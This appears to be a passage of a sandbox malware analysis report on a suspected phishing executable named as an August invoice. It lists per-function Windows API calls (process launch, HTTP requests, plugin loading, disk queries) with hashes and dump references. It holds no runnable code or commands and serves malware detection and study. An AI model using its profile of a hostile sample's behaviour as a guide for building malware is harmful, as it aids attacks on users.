                                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                          APIs
                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                          • String ID: <$@
                                                          • API String ID: 2417854910-1426351568
                                                          • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                          • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3705125965-3916222277
                                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                          APIs
                                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem
                                                          • String ID: 0
                                                          • API String ID: 135850232-4108050209
                                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Long
                                                          • String ID: SysTreeView32
                                                          • API String ID: 847901565-1698111956
                                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Library$AddressFreeLoadProc
                                                          • String ID: AU3_GetPluginDetails
                                                          • API String ID: 145871493-4132174516
                                                          • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                          • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: SysMonthCal32
                                                          • API String ID: 2326795674-1439706946
                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: DestroyWindow
                                                          • String ID: msctls_updown32
                                                          • API String ID: 3375834691-2298589950
                                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID: $<
                                                          • API String ID: 4104443479-428540627
                                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID: \VH
                                                          • API String ID: 1682464887-234962358
                                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID: \VH
                                                          • API String ID: 1682464887-234962358
                                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID: \VH
                                                          • API String ID: 1682464887-234962358
                                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume
                                                          • String ID: \VH
                                                          • API String ID: 2507767853-234962358
                                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume
                                                          • String ID: \VH
                                                          • API String ID: 2507767853-234962358
                                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: msctls_trackbar32
                                                          • API String ID: 3850602802-1010561917
                                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                          APIs
                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                          • String ID: crts
                                                          • API String ID: 943502515-3724388283
                                                          • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                          • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                          APIs
                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
